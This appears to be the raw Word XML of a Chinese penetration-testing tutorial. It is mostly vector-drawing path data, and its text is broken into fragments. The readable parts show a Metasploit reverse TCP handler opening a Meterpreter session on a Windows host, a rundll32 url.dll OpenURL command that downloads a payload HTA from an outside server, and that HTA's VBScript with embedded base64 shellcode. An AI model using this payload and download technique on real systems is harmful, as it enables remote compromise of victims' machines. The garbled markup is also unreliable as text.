      <v:group style="position:absolute;margin-left:217.500pt;margin-top:528.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4350,10570" coordsize="130,270">
        <v:shape style="position:absolute;left:4350;top:10570;width:130;height:270" coordorigin="4350,10570" coordsize="130,270" path="m4376,10589l4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4376,10589,4377,10589,4377,10589,4377,10589,4377,10589,4377,10589,4377,10589,4377,10589,4377,10589,4377,10589,4377,10589,4378,10589,4378,10589,4378,10589,4378,10589,4378,10589,4379,10589,4379,10589,4379,10589,4379,10589,4380,10589,4380,10589,4380,10589,4380,10589,4381,10589,4381,10589,4381,10589,4382,10589,4382,10589,4383,10589,4383,10589,4384,10589,4384,10589,4385,10589,4385,10589,4386,10589,4386,10589,4387,10589,4387,10589,4388,10589,4389,10589,4389,10589,4390,10589,4391,10589,4392,10589,4392,10589,4393,10589,4394,10589,4395,10589,4396,10589,4397,10589,4398,10589,4399,10589,4400,10589,4401,10589,4402,10589,4403,10589,4404,10589,4405,10589,4406,10589,4407,10589,4409,10589,4410,10589,4411,10589,4413,10589,4414,10589,4415,10589,4417,10589,4418,10589,4420,10589,4422,10589,4423,10589,4425,10589,4426,10589,4428,10589,4430,10589,4432,10589,4434,10589,4435,10589,4437,10589,4439,10589,4441,10589,4443,10589,4445,10589,4447,10589,4450,10589,4452,10589,4454,10589,4456,10589,4459,10589,4461,10589,4463,10589,4466,10589,4468,10589,4471,10589,4474,10589,4476,10589,4479,10589,4482,10589,4485,10589,4487,10589,4490,10589,4493,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10589,4496,10590,4496,10590,4496,10590,4496,10590,4496,10590,4496,10590,4496,10590,4496,10590,4496,10590,4496,10591,4496,10591,4496,10591,4496,10591,4496,10591,4496,10592,4496,10592,4496,10592,4496,10593,4496,10593,4496,10593,4496,10594,4496,10594,4496,10595,4496,10595,4496,10596,4496,10596,4496,10597,4496,10598,4496,10598,4496,10599,4496,10600,4496,10601,4496,10601,4496,10602,4496,10603,4496,10604,4496,10605,4496,10606,4496,10607,4496,10608,4496,10609,4496,10611,4496,10612,4496,10613,4496,10615,4496,10616,4496,10617,4496,10619,4496,10620,4496,10622,4496,10624,4496,10625,4496,10627,4496,10629,4496,10631,4496,10633,4496,10635,4496,10637,4496,10639,4496,10641,4496,10644,4496,10646,4496,10648,4496,10651,4496,10653,4496,10656,4496,10658,4496,10661,4496,10664,4496,10667,4496,10670,4496,10673,4496,10676,4496,10679,4496,10682,4496,10686,4496,10689,4496,10693,4496,10696,4496,10700,4496,10703,4496,10707,4496,10711,4496,10715,4496,10719,4496,10723,4496,10728,4496,10732,4496,10736,4496,10741,4496,10745,4496,10750,4496,10755,4496,10760,4496,10765,4496,10770,4496,10775,4496,10780,4496,10785,4496,10791,4496,10796,4496,10802,4496,10808,4496,10814,4496,10820,4496,10826,4496,10832,4496,10838,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4496,10844,4495,10844,4495,10844,4495,10844,4495,10844,4495,10844,4495,10844,4495,10844,4494,10844,4494,10844,4494,10844,4494,10844,4493,10844,4493,10844,4493,10844,4493,10844,4492,10844,4492,10844,4492,10844,4491,10844,4491,10844,4491,10844,4490,10844,4490,10844,4489,10844,4489,10844,4488,10844,4488,10844,4487,10844,4487,10844,4486,10844,4486,10844,4485,10844,4484,10844,4484,10844,4483,10844,4482,10844,4482,10844,4481,10844,4480,10844,4479,10844,4478,10844,4478,10844,4477,10844,4476,10844,4475,10844,4474,10844,4473,10844,4472,10844,4471,10844,4470,10844,4469,10844,4467,10844,4466,10844,4465,10844,4464,10844,4462,10844,4461,10844,4460,10844,4458,10844,4457,10844,4456,10844,4454,10844,4453,10844,4451,10844,4449,10844,4448,10844,4446,10844,4444,10844,4443,10844,4441,10844,4439,10844,4437,10844,4435,10844,4433,10844,4431,10844,4429,10844,4427,10844,4425,10844,4423,10844,4421,10844,4418,10844,4416,10844,4414,10844,4411,10844,4409,10844,4407,10844,4404,10844,4401,10844,4399,10844,4396,10844,4393,10844,4391,10844,4388,10844,4385,10844,4382,10844,4379,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10844,4376,10843,4376,10843,4376,10843,4376,10843,4376,10843,4376,10842,4376,10842,4376,10842,4376,10841,4376,10841,4376,10841,4376,10840,4376,10840,4376,10840,4376,10839,4376,10839,4376,10838,4376,10837,4376,10837,4376,10836,4376,10835,4376,10835,4376,10834,4376,10833,4376,10832,4376,10832,4376,10831,4376,10830,4376,10829,4376,10828,4376,10827,4376,10826,4376,10824,4376,10823,4376,10822,4376,10821,4376,10819,4376,10818,4376,10816,4376,10815,4376,10813,4376,10812,4376,10810,4376,10808,4376,10807,4376,10805,4376,10803,4376,10801,4376,10799,4376,10797,4376,10795,4376,10793,4376,10790,4376,10788,4376,10786,4376,10783,4376,10781,4376,10778,4376,10775,4376,10773,4376,10770,4376,10767,4376,10764,4376,10761,4376,10758,4376,10755,4376,10751,4376,10748,4376,10745,4376,10741,4376,10738,4376,10734,4376,10730,4376,10727,4376,10723,4376,10719,4376,10715,4376,10711,4376,10706,4376,10702,4376,10698,4376,10693,4376,10688,4376,10684,4376,10679,4376,10674,4376,10669,4376,10664,4376,10659,4376,10654,4376,10648,4376,10643,4376,10637,4376,10632,4376,10626,4376,10620,4376,10614,4376,10608,4376,10602,4376,10596,4376,10589e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:193.500pt;margin-top:581.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3870,11630" coordsize="130,250">
        <v:shape style="position:absolute;left:3870;top:11630;width:130;height:250" coordorigin="3870,11630" coordsize="130,250" path="m3896,11640l3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3896,11640,3897,11640,3897,11640,3897,11640,3897,11640,3897,11640,3897,11640,3897,11640,3897,11640,3898,11640,3898,11640,3898,11640,3898,11640,3898,11640,3899,11640,3899,11640,3899,11640,3899,11640,3900,11640,3900,11640,3900,11640,3901,11640,3901,11640,3901,11640,3902,11640,3902,11640,3902,11640,3903,11640,3903,11640,3904,11640,3904,11640,3905,11640,3905,11640,3906,11640,3907,11640,3907,11640,3908,11640,3908,11640,3909,11640,3910,11640,3911,11640,3911,11640,3912,11640,3913,11640,3914,11640,3915,11640,3916,11640,3916,11640,3917,11640,3918,11640,3919,11640,3920,11640,3921,11640,3923,11640,3924,11640,3925,11640,3926,11640,3927,11640,3928,11640,3930,11640,3931,11640,3932,11640,3934,11640,3935,11640,3937,11640,3938,11640,3940,11640,3941,11640,3943,11640,3945,11640,3946,11640,3948,11640,3950,11640,3951,11640,3953,11640,3955,11640,3957,11640,3959,11640,3961,11640,3963,11640,3965,11640,3967,11640,3969,11640,3972,11640,3974,11640,3976,11640,3978,11640,3981,11640,3983,11640,3986,11640,3988,11640,3991,11640,3993,11640,3996,11640,3999,11640,4002,11640,4004,11640,4007,11640,4010,11640,4013,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11640,4016,11641,4016,11641,4016,11641,4016,11641,4016,11641,4016,11641,4016,11642,4016,11642,4016,11642,4016,11643,4016,11643,4016,11643,4016,11644,4016,11644,4016,11644,4016,11645,4016,11645,4016,11646,4016,11646,4016,11647,4016,11648,4016,11648,4016,11649,4016,11650,4016,11650,4016,11651,4016,11652,4016,11653,4016,11654,4016,11655,4016,11656,4016,11657,4016,11658,4016,11659,4016,11660,4016,11661,4016,11662,4016,11664,4016,11665,4016,11666,4016,11668,4016,11669,4016,11671,4016,11673,4016,11674,4016,11676,4016,11678,4016,11680,4016,11681,4016,11683,4016,11685,4016,11687,4016,11690,4016,11692,4016,11694,4016,11696,4016,11699,4016,11701,4016,11704,4016,11706,4016,11709,4016,11712,4016,11715,4016,11717,4016,11720,4016,11723,4016,11726,4016,11730,4016,11733,4016,11736,4016,11740,4016,11743,4016,11747,4016,11750,4016,11754,4016,11758,4016,11762,4016,11766,4016,11770,4016,11774,4016,11778,4016,11782,4016,11787,4016,11791,4016,11796,4016,11801,4016,11805,4016,11810,4016,11815,4016,11820,4016,11825,4016,11831,4016,11836,4016,11841,4016,11847,4016,11853,4016,11858,4016,11864,4016,11870,4016,11876,4016,11882,4016,11889,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4016,11895,4015,11895,4015,11895,4015,11895,4015,11895,4015,11895,4015,11895,4015,11895,4015,11895,4014,11895,4014,11895,4014,11895,4014,11895,4014,11895,4013,11895,4013,11895,4013,11895,4013,11895,4012,11895,4012,11895,4012,11895,4011,11895,4011,11895,4011,11895,4010,11895,4010,11895,4010,11895,4009,11895,4009,11895,4008,11895,4008,11895,4007,11895,4007,11895,4006,11895,4005,11895,4005,11895,4004,11895,4004,11895,4003,11895,4002,11895,4001,11895,4001,11895,4000,11895,3999,11895,3998,11895,3997,11895,3996,11895,3996,11895,3995,11895,3994,11895,3993,11895,3992,11895,3991,11895,3989,11895,3988,11895,3987,11895,3986,11895,3985,11895,3983,11895,3982,11895,3981,11895,3980,11895,3978,11895,3977,11895,3975,11895,3974,11895,3972,11895,3971,11895,3969,11895,3967,11895,3966,11895,3964,11895,3962,11895,3961,11895,3959,11895,3957,11895,3955,11895,3953,11895,3951,11895,3949,11895,3947,11895,3945,11895,3943,11895,3940,11895,3938,11895,3936,11895,3934,11895,3931,11895,3929,11895,3926,11895,3924,11895,3921,11895,3919,11895,3916,11895,3913,11895,3910,11895,3908,11895,3905,11895,3902,11895,3899,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11895,3896,11894,3896,11894,3896,11894,3896,11894,3896,11894,3896,11894,3896,11894,3896,11893,3896,11893,3896,11893,3896,11893,3896,11892,3896,11892,3896,11892,3896,11891,3896,11891,3896,11890,3896,11890,3896,11890,3896,11889,3896,11889,3896,11888,3896,11887,3896,11887,3896,11886,3896,11885,3896,11885,3896,11884,3896,11883,3896,11882,3896,11881,3896,11880,3896,11879,3896,11878,3896,11877,3896,11876,3896,11875,3896,11874,3896,11872,3896,11871,3896,11870,3896,11868,3896,11867,3896,11865,3896,11864,3896,11862,3896,11861,3896,11859,3896,11857,3896,11855,3896,11853,3896,11851,3896,11849,3896,11847,3896,11845,3896,11843,3896,11841,3896,11838,3896,11836,3896,11834,3896,11831,3896,11829,3896,11826,3896,11823,3896,11820,3896,11817,3896,11815,3896,11812,3896,11808,3896,11805,3896,11802,3896,11799,3896,11795,3896,11792,3896,11788,3896,11785,3896,11781,3896,11777,3896,11773,3896,11769,3896,11765,3896,11761,3896,11757,3896,11752,3896,11748,3896,11744,3896,11739,3896,11734,3896,11730,3896,11725,3896,11720,3896,11715,3896,11710,3896,11704,3896,11699,3896,11693,3896,11688,3896,11682,3896,11677,3896,11671,3896,11665,3896,11659,3896,11653,3896,11646,3896,11640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1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46" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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dc4867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multi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handler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2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Started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reverse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TCP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handler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on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.4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53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Sending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dc4867"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stage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179779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bytes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.3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154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Meterpreter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session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dc4867"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>opened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.4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53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.3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5018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at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2019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01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21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04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41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43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0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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6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meterpreter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getuid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Server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username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John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PC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\John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meterpreter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getpid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7702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Current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pid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8584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11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74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同样可以调用url.d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ll下载payload：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rundll32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exe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url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dll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,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OpenURL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http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//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.4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Micropoor_url_dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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hta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="315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附录：Micropoo</w:t>
      </w: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r_url_dll.hta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346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6471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&lt;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script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language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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"VBScript"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="1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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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Dim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binary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binary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659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"rundll32.exe"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4</w:t>
      </w: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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324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Dim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13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code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code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"/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMH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PDQHH4vJSV4tSEItKPItMEXjjSAHRU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YtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7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fSR15FiLWCQB02aLDEuLWBwB04sEiw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HQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfV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GhMdyYHiej/0LiQAQAAKcRUUGgpgGs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A/9VqCmjAqAEEaAIAADWJ5lBQUFBAUEBQaOoP3+D/1Z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dqEFZXaJmldGH/1YXAdAr/Tgh17Ohn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AAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmo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AaFikU+X/1ZNTagBWU1doAtnIX//Vg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/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8M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JA+FcP///+mb////AcM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pxnXBw7vwtaJWagBT/9U="</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="76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7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="11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8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7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8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sub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404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Debug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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s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)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9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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>End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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sub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7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Sub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SetVersion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9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>End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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sub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842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:370" coordorigin="1490,990" coordsize="8990,370" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1024,10484,1026,10484,1027,10484,1029,10484,1031,10484,1033,10484,1035,10484,1037,10484,1039,10484,1041,10484,1043,10484,1045,10484,1048,10484,1050,10484,1053,10484,1055,10484,1058,10484,1061,10484,1064,10484,1066,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1113,10484,1118,10484,1122,10484,1127,10484,1131,10484,1136,10484,1141,10484,1146,10484,1151,10484,1156,10484,1162,10484,1167,10484,1173,10484,1179,10484,1184,10484,1190,10484,1196,10484,1203,10484,1209,10484,1216,10484,1222,10484,1229,10484,1236,10484,1243,10484,1250,10484,1257,10484,1265,10484,1272,10484,1280,10484,1288,10484,1296,10484,1304,10484,1312,10484,1321,10484,1329,10484,1338,10484,1347,10484,1356,10484,1365,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10483,1375,10482,1375,10482,1375,10480,1375,10479,1375,10477,1375,10475,1375,10473,1375,10470,1375,10466,1375,10462,1375,10458,1375,10453,1375,10448,1375,10442,1375,10435,1375,10428,1375,10419,1375,10411,1375,10401,1375,10391,1375,10379,1375,10367,1375,10354,1375,10340,1375,10326,1375,10310,1375,10293,1375,10275,1375,10256,1375,10236,1375,10215,1375,10192,1375,10168,1375,10143,1375,10117,1375,10090,1375,10061,1375,10031,1375,9999,1375,9966,1375,9931,1375,9895,1375,9858,1375,9819,1375,9778,1375,9735,1375,9691,1375,9646,1375,9598,1375,9549,1375,9498,1375,9445,1375,9391,1375,9334,1375,9275,1375,9215,1375,9153,1375,9088,1375,9022,1375,8953,1375,8883,1375,8810,1375,8735,1375,8658,1375,8578,1375,8497,1375,8413,1375,8326,1375,8238,1375,8146,1375,8053,1375,7957,1375,7859,1375,7758,1375,7654,1375,7548,1375,7439,1375,7328,1375,7214,1375,7097,1375,6977,1375,6855,1375,6730,1375,6602,1375,6471,1375,6337,1375,6201,1375,6061,1375,5918,1375,5773,1375,5624,1375,5472,1375,5317,1375,5159,1375,4997,1375,4833,1375,4665,1375,4494,1375,4319,1375,4141,1375,3960,1375,3776,1375,3587,1375,3396,1375,3201,1375,3002,1375,2800,1375,2594,1375,2385,1375,2172,1375,1955,1375,1734,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1373,1510,1373,1510,1373,1510,1373,1510,1372,1510,1372,1510,1372,1510,1371,1510,1371,1510,1370,1510,1370,1510,1369,1510,1369,1510,1368,1510,1367,1510,1367,1510,1366,1510,1365,1510,1364,1510,1363,1510,1362,1510,1361,1510,1360,1510,1359,1510,1358,1510,1357,1510,1356,1510,1354,1510,1353,1510,1352,1510,1350,1510,1348,1510,1347,1510,1345,1510,1343,1510,1342,1510,1340,1510,1338,1510,1336,1510,1333,1510,1331,1510,1329,1510,1327,1510,1324,1510,1322,1510,1319,1510,1316,1510,1314,1510,1311,1510,1308,1510,1305,1510,1302,1510,1298,1510,1295,1510,1292,1510,1288,1510,1284,1510,1281,1510,1277,1510,1273,1510,1269,1510,1265,1510,1261,1510,1256,1510,1252,1510,1247,1510,1243,1510,1238,1510,1233,1510,1228,1510,1223,1510,1218,1510,1212,1510,1207,1510,1201,1510,1196,1510,1190,1510,1184,1510,1178,1510,1171,1510,1165,1510,1159,1510,1152,1510,1145,1510,1138,1510,1131,1510,1124,1510,1117,1510,1110,1510,1102,1510,1094,1510,1086,1510,1078,1510,1070,1510,1062,1510,1053,1510,1045,1510,1036,1510,1027,1510,1018,1510,1009,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:390" coordorigin="1490,990" coordsize="30,390" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1006,1517,1006,1517,1007,1517,1008,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1018,1517,1020,1517,1021,1517,1023,1517,1024,1517,1026,1517,1027,1517,1029,1517,1031,1517,1033,1517,1035,1517,1037,1517,1039,1517,1041,1517,1043,1517,1045,1517,1048,1517,1050,1517,1053,1517,1055,1517,1058,1517,1061,1517,1064,1517,1066,1517,1070,1517,1073,1517,1076,1517,1079,1517,1083,1517,1086,1517,1090,1517,1093,1517,1097,1517,1101,1517,1105,1517,1109,1517,1113,1517,1118,1517,1122,1517,1127,1517,1131,1517,1136,1517,1141,1517,1146,1517,1151,1517,1156,1517,1162,1517,1167,1517,1173,1517,1179,1517,1184,1517,1190,1517,1196,1517,1203,1517,1209,1517,1216,1517,1222,1517,1229,1517,1236,1517,1243,1517,1250,1517,1257,1517,1265,1517,1272,1517,1280,1517,1288,1517,1296,1517,1304,1517,1312,1517,1321,1517,1329,1517,1338,1517,1347,1517,1356,1517,1365,1517,1375e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:67.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:370" coordorigin="1490,1350" coordsize="8990,370" path="m1510,1375l1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1511,1375,1512,1375,1512,1375,1514,1375,1515,1375,1517,1375,1519,1375,1521,1375,1524,1375,1528,1375,1532,1375,1536,1375,1541,1375,1546,1375,1552,1375,1559,1375,1566,1375,1575,1375,1583,1375,1593,1375,1603,1375,1615,1375,1627,1375,1640,1375,1654,1375,1668,1375,1684,1375,1701,1375,1719,1375,1738,1375,1758,1375,1780,1375,1802,1375,1826,1375,1851,1375,1877,1375,1904,1375,1933,1375,1963,1375,1995,1375,2028,1375,2063,1375,2099,1375,2136,1375,2175,1375,2216,1375,2259,1375,2303,1375,2348,1375,2396,1375,2445,1375,2496,1375,2549,1375,2604,1375,2660,1375,2719,1375,2779,1375,2841,1375,2906,1375,2972,1375,3041,1375,3112,1375,3184,1375,3259,1375,3336,1375,3416,1375,3498,1375,3582,1375,3668,1375,3757,1375,3848,1375,3941,1375,4037,1375,4136,1375,4236,1375,4340,1375,4446,1375,4555,1375,4666,1375,4780,1375,4897,1375,5017,1375,5139,1375,5264,1375,5392,1375,5523,1375,5657,1375,5793,1375,5933,1375,6076,1375,6222,1375,6370,1375,6522,1375,6677,1375,6835,1375,6997,1375,7161,1375,7329,1375,7500,1375,7675,1375,7853,1375,8034,1375,8219,1375,8407,1375,8598,1375,8793,1375,8992,1375,9194,1375,9400,1375,9609,1375,9823,1375,10039,1375,10260,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1376,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1378,10484,1379,10484,1379,10484,1380,10484,1380,10484,1381,10484,1382,10484,1382,10484,1383,10484,1384,10484,1385